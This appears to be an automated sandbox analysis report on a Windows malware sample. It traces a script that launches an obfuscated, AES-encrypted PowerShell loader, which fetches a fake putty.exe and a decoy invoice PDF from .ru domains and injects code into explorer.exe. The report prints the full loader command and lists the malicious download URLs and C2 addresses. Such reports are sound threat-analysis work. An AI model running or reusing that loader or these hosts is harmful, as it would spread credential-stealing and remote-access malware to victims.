                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function wfmpf($mmid){return -split ($mmid -replace '..', '0x$& ')};$ralma = wfmpf('6ddd913a204eda9b48cf5583720fa53b3c5cdee6e974b7bf173341d66880a83528e76a5a809eda47d2c263e95e00a51ae2a33d069542ccae0c0fef761523c7afe37b64185c653b4c4bf39e67e1d89cd6636984fc646c493c76294187d1b2b75d79dbaab680164b0c94848aa09bf281c313b7c3c2532160823efecf40af7a9240375a29dd3d82c002b29486566c166f6f04711f20f7f5b2b6cdc61aa7908a19fe7de86886141f7a340433f1a7d86ed97fa28c2ac93960b814156d48d922f4b029c07206c1aef6b44ff7af133921b3db8f2ff073f4cffa862edb9214ce28c296d8fb5162d5ab69b39935125ab3242b742a33d4141147fcf532eeb49a69fea321ace3e5bffdc1520fb98a143bbafd22bb525550d37d463f288c61a14b1258687eb239e9a260d0e160d9614f09967fe97f9b2ce6be1c24011e78caab16ceea4345678eab2756d340ea7c849f355578cb519aa0de8625f493eadbd13583073be0d247ebd15cd925fe851855979d18651080cf3bd6fb803715b373c134f7d1ea1e3fab7e02d0d4ad6fc40ead36c911a1ae73d421ac10efe01473747c3b4fc05fd6d4d08c3521db6ba6e9eef6cb8b1c7fc76884c910c22860e3575831c23a88693a6d7fe1f158e001ed75b4588c08ed639a5b3f223e76cf1c17495201f16d4149f714ca4bd42d2d5e17399cf5e4fcae83c94e9dba2089f3c430ce2585999674221ce62e61dcb128072e936b5dfed4cebeeba9232e582c33488e026e0f5123211b5e9b12b46c0ca95d1f9a903b6b2310cb4e108c5c9b8328e9021e1b76eae56ef681bbc20e3c74bccaa8e25decf9c13896d1252b4b86b2315f62ecc43fdd7f9d446c70e046c7872722c69950ac7a26563c81c0a52f3b0f0d43d41fe0060d34820472ae9a9818d2fd3b117a4b0084eaa21d1666a9297dcaeacadd63462fbb1e22c56869537ca0c0e1cd52eabff12858bc9b1dddc8cb4c70e9fa2549b5144f447d1defc94f5830d9cac04660b19c385ec1a3d989ac7bad8c3e7e908c697c4da249d156475901b73f3c800c602e586aa6998c17eb947e3d2e8a13e7292546210af7eb29b003da7407af81f5b7811619b414e06d1d724ef79fe960509f6d85f4b55a5b6a365f6ee49825f0b19433ea2c64737468f1faa1dda90e230f23cb6751052459789fac25ab27097516e251b4c56d5b1497389f33f64f9c729fadb9f635e6771d884ffad2363c3d29d49812042636e0b8aaee30');$idrjo=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((wfmpf('4f6c6d774c5361495051654d7258624f')),[byte[]]::new(16)).transformfinalblock($ralma,0,$ralma.length)); & $idrjo.substring(0,3) $idrjo.substring(3)Jump to behavior
                  Source: explorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 0000000C.00000000.2206200060.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 0000000C.00000000.2206200060.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.2208456840.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 0000000C.00000000.2206200060.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 0000000C.00000000.2206200060.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 0000000C.00000000.2205441339.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: __crtGetLocaleInfoA_stat,6_2_0041780E
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,6_2_004114A0
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW,6_2_00414674
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_00410E32
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,6_2_0040B2C7
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: __crtGetLocaleInfoA_stat,13_2_0041780E
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,13_2_004114A0
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW,13_2_00414674
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,13_2_00410E32
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,13_2_0040B2C7
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 6.3.putty.exe.1f90000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.3.ddhfdfu.620000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.putty.exe.6d0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.ddhfdfu.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.ddhfdfu.610e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2152981082.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.2421108452.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2474086059.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 6.3.putty.exe.1f90000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.3.ddhfdfu.620000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.putty.exe.6d0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.ddhfdfu.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.ddhfdfu.610e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2152981082.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000003.2421108452.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2474086059.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting
                  Valid Accounts2
                  Command and Scripting Interpreter
                  211
                  Scripting
                  312
                  Process Injection
                  21
                  Masquerading
                  OS Credential Dumping421
                  Security Software Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Data Obfuscation
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  141
                  Virtualization/Sandbox Evasion
                  LSASS Memory141
                  Virtualization/Sandbox Evasion
                  Remote Desktop ProtocolData from Removable Media1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)312
                  Process Injection
                  Security Account Manager3
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive13
                  Ingress Tool Transfer
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Hidden Files and Directories
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture4
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeylogging124
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Software Packing
                  Cached Domain Credentials133
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577216 Sample: #U0421#U043a#U0430#U043d-#U... Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 43 spotcarservice.ru 2->43 45 restructurisationservice.ru 2->45 47 4 other IPs or domains 2->47 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 5 other signatures 2->67 10 wscript.exe 1 2->10         started        13 ddhfdfu 2->13         started        15 svchost.exe 1 1 2->15         started        signatures3 process4 dnsIp5 79 VBScript performs obfuscated calls to suspicious functions 10->79 81 Suspicious powershell command line found 10->81 83 Wscript starts Powershell (via cmd or directly) 10->83 91 2 other signatures 10->91 18 powershell.exe 17 20 10->18         started        85 Antivirus detection for dropped file 13->85 87 Detected unpacking (changes PE section rights) 13->87 89 Machine Learning detection for dropped file 13->89 93 6 other signatures 13->93 53 127.0.0.1 unknown unknown 15->53 signatures6 process7 dnsIp8 49 spotcarservice.ru 94.156.177.51, 49704, 49766, 49772 NET1-ASBG Bulgaria 18->49 39 C:\Users\user\AppData\Roaming\putty.exe, PE32 18->39 dropped 69 Powershell drops PE file 18->69 23 putty.exe 18->23         started        26 Acrobat.exe 67 18->26         started        28 conhost.exe 18->28         started        file9 signatures10 process11 signatures12 71 Antivirus detection for dropped file 23->71 73 Machine Learning detection for dropped file 23->73 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->75 77 5 other signatures 23->77 30 explorer.exe 63 2 23->30 injected 35 AcroCEF.exe 106 26->35         started        process13 dnsIp14 51 connecticutproperty.ru 109.70.26.37, 49778, 49938, 49955 RU-CENTERRU Russian Federation 30->51 41 C:\Users\user\AppData\Roaming\ddhfdfu, PE32 30->41 dropped 55 System process connects to network (likely due to code injection or exploit) 30->55 57 Benign windows process drops PE files 30->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->59 37 AcroCEF.exe 4 35->37         started        file15 signatures16 process17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\putty.exe100%AviraHEUR/AGEN.1306956
                  C:\Users\user\AppData\Roaming\ddhfdfu100%AviraHEUR/AGEN.1306956
                  C:\Users\user\AppData\Roaming\putty.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\ddhfdfu100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://spotcarservice.ru/fdjskf88cvt/putty.exe0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoce2.pdf0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdj0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88c0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoce20%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjs0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/putty.e0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf880%Avira URL Cloudsafe
                  http://constractionscity1991.lat/0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoce2.p0%Avira URL Cloudsafe
                  http://spotcarservice.ru/f0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoce2.0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cv0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/in0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjsk0%Avira URL Cloudsafe
                  http://spotcarservice.r0%Avira URL Cloudsafe
                  http://spotcarservice.ru/0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/put0%Avira URL Cloudsafe
                  http://connecticutproperty.ru/0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoce2.pdfp0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invo0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoc0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/p0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoce2.pd0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf80%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/i0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/pu0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/inv0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/putt0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/putty.0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/invoce0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/putty.ex0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fd0%Avira URL Cloudsafe
                  http://spotcarservice.ru/fdjskf88cvt/putty0%Avira URL Cloudsafe
                  http://restructurisationservice.ru/0%Avira URL Cloudsafe
                  http://spotcarservice.ru0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalse
                    high
                    constractionscity1991.lat
                    94.156.177.51
                    truetrue
                      unknown
                      restructurisationservice.ru
                      94.156.177.51
                      truetrue
                        unknown
                        spotcarservice.ru
                        94.156.177.51
                        truetrue
                          unknown
                          connecticutproperty.ru
                          109.70.26.37
                          truetrue
                            unknown
                            x1.i.lencr.org
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              http://spotcarservice.ru/fdjskf88cvt/invoce2.pdftrue
                              • Avira URL Cloud: safe
                              unknown
                              http://constractionscity1991.lat/true
                              • Avira URL Cloud: safe
                              unknown
                              http://connecticutproperty.ru/true
                              • Avira URL Cloud: safe
                              unknown
                              http://restructurisationservice.ru/true
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://word.office.comonexplorer.exe, 0000000C.00000000.2215211118.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://spotcarservice.ru/fdjskf88cvt/putty.epowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://spotcarservice.ru/fdjskf88cpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://spotcarservice.ru/fdjskf88cvt/invoce2powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://spotcarservice.ru/fdjspowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                http://spotcarservice.ru/fdjskf88cvt/putty.exepowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://powerpoint.office.comcemberexplorer.exe, 0000000C.00000000.2222539640.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://acsk.privatbank.ua/services/ocsp/0Lpowershell.exe, 00000002.00000002.2127875110.000001DD67D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drfalse
                                      high
                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.2141167240.00000178BBE10000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                        high
                                        https://excel.office.comexplorer.exe, 0000000C.00000000.2215211118.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.microexplorer.exe, 0000000C.00000000.2212797768.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.2212857401.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.2211752150.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                            high
                                            http://spotcarservice.ru/fdjpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://spotcarservice.ru/fdjskf88powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://spotcarservice.ru/fdjskf88cvtpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://spotcarservice.ru/fdjskf88cvt/invoce2.powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://spotcarservice.ru/fdjskf88cvt/invoce2.ppowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://spotcarservice.ru/fdjskf88cvpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://spotcarservice.ru/powershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://spotcarservice.ru/fdjskpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 0000000C.00000000.2222539640.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://acsk.privatbank.ua/crl/PB.crl0powershell.exe, 00000002.00000002.2198563614.000001DD7798F000.00000004.00000800.00020000.00000000.sdmp, invoce2.pdf.2.drfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2127875110.000001DD67921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://spotcarservice.ru/fpowershell.exe, 00000002.00000002.2127875110.000001DD67DCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://spotcarservice.ru/fdjskf88cvt/inpowershell.exe, 00000002.00000002.2127875110.000001DD68D68000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
